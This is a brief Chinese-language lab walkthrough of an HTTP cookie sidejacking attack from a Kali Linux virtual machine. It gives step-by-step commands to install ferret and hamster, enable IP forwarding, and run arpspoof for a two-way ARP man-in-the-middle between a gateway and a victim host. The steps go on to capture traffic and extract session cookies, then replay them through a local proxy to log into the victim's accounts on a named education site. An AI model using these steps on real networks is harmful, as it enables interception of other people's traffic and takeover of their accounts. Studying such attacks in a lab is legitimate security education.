1、首先保证虚拟机中的kali系统能够和外部网络通信,查看设置----虚拟网络编辑器----桥接无线网卡-------kali编辑网络设置为DHCP自动获取地址,设置完后重新激活ifconfig命令查看IP:
2、安装攻击工具
dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386
apt-get install hamster-sidejack:
劫持用户的登录信息cookies
echo 1 > /proc/sys/net/ipv4/ip_forward 开启kali路由转发功能
arpspoof -i eth0 -t 192.168.0.1 192.168.0.106 -r 双向ARP 进行中间人攻击:
开启wireshark
在目标主机上登录相对应的网站,尽量选择安全性较低的,登录要留存过程 ,多刷新几次产生流量
保存窃取的流量为.pacp文件 tcpdump:
ferret-sidejack -r 处理流量,生成cookies文件hamster.text
启动hamster-sidejack:
打开浏览器选项中设置代理为127.0.0.1:1234
地址栏输入127.0.0.1:1234:
hamaster 找到目标IP ,登录目标用户的网站
抓包的时候,抓取的时间,尽量长
目标网站:超星
http cookies实验结束。